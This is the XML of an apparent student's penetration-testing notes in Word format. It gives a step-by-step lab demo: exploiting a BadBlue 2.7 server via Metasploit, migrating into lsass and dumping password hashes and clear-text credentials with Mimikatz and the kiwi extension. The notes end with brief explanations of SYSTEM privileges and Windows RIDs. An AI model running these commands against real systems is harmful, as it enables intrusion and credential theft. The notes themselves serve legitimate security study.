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29AED" w14:textId="14761681" w:rsidR="00503C4C" w:rsidRDefault="00503C4C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A663A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dumping Hashes </w:t>
      </w:r>
      <w:r w:rsidR="007A663A" w:rsidRPr="007A663A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="007A663A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A663A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A663A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BC3F6E" w14:textId="5755DAEC" w:rsidR="007A663A" w:rsidRDefault="007A663A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB217FF" w14:textId="7750C9A2" w:rsidR="007A663A" w:rsidRDefault="007A663A">
      <w:r>
        <w:t xml:space="preserve">Windows post exploitation tool. (extract </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>clear ,hashes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and Kerberos tickets).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E00A53" w14:textId="750E6069" w:rsidR="007A663A" w:rsidRDefault="00581258">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581258">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A663A">
        <w:t xml:space="preserve">Extract the hashes from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A663A">
        <w:t>lsass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A663A">
        <w:t xml:space="preserve"> process memory where the hashes are cached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E5E739" w14:textId="77777777" w:rsidR="00581258" w:rsidRDefault="00581258"/>
    <w:p w14:paraId="2EB1FE7D" w14:textId="64B0B3AC" w:rsidR="00581258" w:rsidRPr="00581258" w:rsidRDefault="00581258">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581258">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EF5CD8" w14:textId="77777777" w:rsidR="00581258" w:rsidRDefault="00581258"/>
    <w:p w14:paraId="07779374" w14:textId="520787C9" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Nmap  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">s V </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B3374D4" w14:textId="4605A367" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> http 2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695AB159" w14:textId="1D6FFB72" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:r>
        <w:t xml:space="preserve">Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BD3709" w14:textId="698F649A" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EB8AA7" w14:textId="4D32D6A4" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5829D2BE" w14:textId="1F89D3B3" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:r>
        <w:t>Use (num/name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CACA1E6" w14:textId="4C9759AE" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07690D33" w14:textId="18A077B0" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:r>
        <w:t xml:space="preserve"> Set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="658442B6" w14:textId="6E667659" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:r>
        <w:t>Run/exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABF353D" w14:textId="77777777" w:rsidR="00581258" w:rsidRDefault="00581258"/>
    <w:p w14:paraId="0CB4A105" w14:textId="2627B6B2" w:rsidR="00581258" w:rsidRPr="00581258" w:rsidRDefault="00581258">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581258">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581258">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00581258">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616B39E7" w14:textId="53520E5F" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16B4D9BD" w14:textId="65A2D357" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59268C1D" w14:textId="5A581670" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>migrate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lsass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED09043" w14:textId="35F4CFC2" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pgrep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lsass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B2EF193" w14:textId="37FB61F4" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:r>
        <w:t>Migrate (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388F109A" w14:textId="33330500" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27F945C7" w14:textId="10900A3F" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:r>
        <w:t>Load kiwi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082044AC" w14:textId="2400786D" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="002D6923">
        <w:t xml:space="preserve"> # show help menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BD7885" w14:textId="3AF8A0B4" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Creds_all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E5A39EB" w14:textId="77406A75" w:rsidR="00581258" w:rsidRDefault="00581258">
      <w:r>
        <w:t xml:space="preserve"># from the window </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D6923">
        <w:t xml:space="preserve">8.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D6923">
        <w:t>donnot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002D6923">
        <w:t xml:space="preserve"> store the clear text password at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D572901" w14:textId="1D5BC225" w:rsidR="002D6923" w:rsidRDefault="002D6923">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lsa_dump_sam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A783802" w14:textId="649E8985" w:rsidR="002D6923" w:rsidRDefault="002D6923">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lsa_dump_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4389EF38" w14:textId="40166563" w:rsidR="00581258" w:rsidRDefault="002D6923">
      <w:r>
        <w:t xml:space="preserve">#in some </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cases</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>provide</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the clear text password (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lsa_dump_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0BC62F" w14:textId="77777777" w:rsidR="00581258" w:rsidRDefault="00581258"/>
    <w:p w14:paraId="28BDF773" w14:textId="6FB52D5B" w:rsidR="00581258" w:rsidRDefault="00564E54">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="056F31E8" w14:textId="480D3B13" w:rsidR="00564E54" w:rsidRDefault="00564E54">
      <w:r>
        <w:t>Cd c:\\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228E4CED" w14:textId="0D7E58BF" w:rsidR="00564E54" w:rsidRDefault="00564E54">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E9620D" w14:textId="5C6C8A3C" w:rsidR="00564E54" w:rsidRDefault="00564E54">
      <w:r>
        <w:t>Cd temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C321031" w14:textId="23E65410" w:rsidR="00564E54" w:rsidRDefault="00564E54">
      <w:r>
        <w:t>Upload /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows.resources</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/x64/mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2AD7C0" w14:textId="6DCC15F5" w:rsidR="00564E54" w:rsidRDefault="00564E54">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C736F6" w14:textId="704307A4" w:rsidR="00564E54" w:rsidRDefault="00564E54">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B20CB4D" w14:textId="70516BDF" w:rsidR="00564E54" w:rsidRDefault="00564E54">
      <w:r>
        <w:t>.\mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD130F3" w14:textId="2D4A10FA" w:rsidR="00564E54" w:rsidRDefault="00564E54">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Privilege::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">debug </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20552FCD" w14:textId="4B141EC5" w:rsidR="00564E54" w:rsidRDefault="00564E54">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the output is privilege 20 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ok</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> then it means that you have required privilege to ex</w:t>
      </w:r>
      <w:r w:rsidR="00951DA1">
        <w:t>tract</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hashes form the memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD3E4EA" w14:textId="55E03CE7" w:rsidR="00564E54" w:rsidRDefault="00564E54">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Lsadump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>sam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47B49563" w14:textId="5ACF984F" w:rsidR="00564E54" w:rsidRDefault="00564E54">
      <w:r>
        <w:t xml:space="preserve"># it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>provide</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> more info </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>then</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the kiwi did.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E5A766" w14:textId="64DF1D9C" w:rsidR="00564E54" w:rsidRDefault="00564E54">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Lsadump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E97D1D8" w14:textId="77777777" w:rsidR="00120F62" w:rsidRDefault="00120F62"/>
    <w:p w14:paraId="67CF7B00" w14:textId="4D640862" w:rsidR="00120F62" w:rsidRDefault="00120F62">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the system is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>configure</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to store the logon password in clear </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>text ,show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>logonpassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="21E8FEBE" w14:textId="16A0D239" w:rsidR="00120F62" w:rsidRDefault="00120F62">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>logonpasswords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48119071" w14:textId="77777777" w:rsidR="00120F62" w:rsidRDefault="00120F62"/>
    <w:p w14:paraId="4A389E3B" w14:textId="77777777" w:rsidR="00A133B3" w:rsidRDefault="00A133B3"/>
    <w:p w14:paraId="5BB8E9CE" w14:textId="57CB992A" w:rsidR="00581258" w:rsidRDefault="00581258"/>
    <w:p w14:paraId="2DBC1C99" w14:textId="77777777" w:rsidR="0096090F" w:rsidRDefault="0096090F"/>
    <w:p w14:paraId="6FAD49E3" w14:textId="77777777" w:rsidR="0096090F" w:rsidRDefault="0096090F"/>
    <w:p w14:paraId="0AD04675" w14:textId="77777777" w:rsidR="0096090F" w:rsidRDefault="0096090F"/>
    <w:p w14:paraId="6C7B3B7C" w14:textId="77777777" w:rsidR="0096090F" w:rsidRDefault="0096090F"/>
    <w:p w14:paraId="4E21097C" w14:textId="77777777" w:rsidR="0096090F" w:rsidRDefault="0096090F"/>
    <w:p w14:paraId="1337F4FE" w14:textId="17472605" w:rsidR="0096090F" w:rsidRPr="0096090F" w:rsidRDefault="0096090F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096090F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18956DCA" w14:textId="182BB46B" w:rsidR="0096090F" w:rsidRDefault="0096090F">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">Pre </w:t>
      </w:r>
      <w:r>
        <w:t>compiled</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">executable comes prepackaged in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Linux ,parrot</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> os.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72098670" w14:textId="31F228B0" w:rsidR="0096090F" w:rsidRDefault="0096090F">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Alternative ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as we get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session on target window, then we use the extension </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>kiwi,(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>which help in dumping hashes from the memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432FA3B9" w14:textId="267A0182" w:rsidR="00581258" w:rsidRDefault="00581258" w:rsidP="00581258">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581258">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>require</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> elevated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B21655" w14:textId="0CC6B390" w:rsidR="00581258" w:rsidRPr="00581258" w:rsidRDefault="00581258" w:rsidP="00581258">
      <w:r w:rsidRPr="00581258">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t>: highest authority system in the window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F05DDF0" w14:textId="77777777" w:rsidR="0096090F" w:rsidRDefault="0096090F"/>
    <w:p w14:paraId="216542BC" w14:textId="7C04FD44" w:rsidR="00C72C63" w:rsidRPr="00C72C63" w:rsidRDefault="00C72C63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72C63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is RID?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F92533" w14:textId="77777777" w:rsidR="00C72C63" w:rsidRPr="00C72C63" w:rsidRDefault="00C72C63" w:rsidP="00C72C63">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72C63">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72C63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RID</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72C63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> = Relative Identifier</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72C63">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E1F938" w14:textId="073ACE87" w:rsidR="0096090F" w:rsidRDefault="00C72C63">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72C63">
        <w:t>  It’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72C63">
        <w:t xml:space="preserve"> part of a Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72C63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Identifier (SID)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72C63">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3578CF8A" w14:textId="071B79F4" w:rsidR="00C72C63" w:rsidRDefault="00C72C63">
      <w:r w:rsidRPr="00C72C63">
        <w:t>Some common ones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E0F6FA" w14:textId="34C55CDE" w:rsidR="00C72C63" w:rsidRPr="00C72C63" w:rsidRDefault="00C72C63" w:rsidP="00C72C63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72C63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72C63">
        <w:t xml:space="preserve"> → Built-in Administrator account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6FC6F0" w14:textId="02B8AF71" w:rsidR="00C72C63" w:rsidRPr="00C72C63" w:rsidRDefault="00C72C63" w:rsidP="00C72C63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72C63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>501</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72C63">
        <w:t xml:space="preserve"> → Guest account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2FB13D" w14:textId="7DDD9970" w:rsidR="00C72C63" w:rsidRPr="00C72C63" w:rsidRDefault="00C72C63" w:rsidP="00C72C63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72C63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1000+</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72C63">
        <w:t xml:space="preserve"> → Normal user accounts (created later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A05488" w14:textId="77777777" w:rsidR="007A663A" w:rsidRPr="007A663A" w:rsidRDefault="007A663A"/>
    <w:sectPr w:rsidR="007A663A" w:rsidRPr="007A66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476D6C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF4095DE"/>
    <w:lvl w:ilvl="0" w:tplc="0324B94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453A75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B72F9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4633817">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="5575470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BB9"/>
    <w:rsid w:val="00120F62"/>
    <w:rsid w:val="002B5A3C"/>
    <w:rsid w:val="002D6923"/>
    <w:rsid w:val="00503C4C"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00564E54"/>
    <w:rsid w:val="00581258"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="007A663A"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00875BB9"/>
    <w:rsid w:val="00951DA1"/>
    <w:rsid w:val="0096090F"/>
    <w:rsid w:val="00A133B3"/>
    <w:rsid w:val="00C72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64BC2F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AE743A0D-E20C-4671-9E53-E37649972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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B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3</Pages>
  <Words>249</Words>
  <Characters>1424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21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-02T07:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-02T08:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>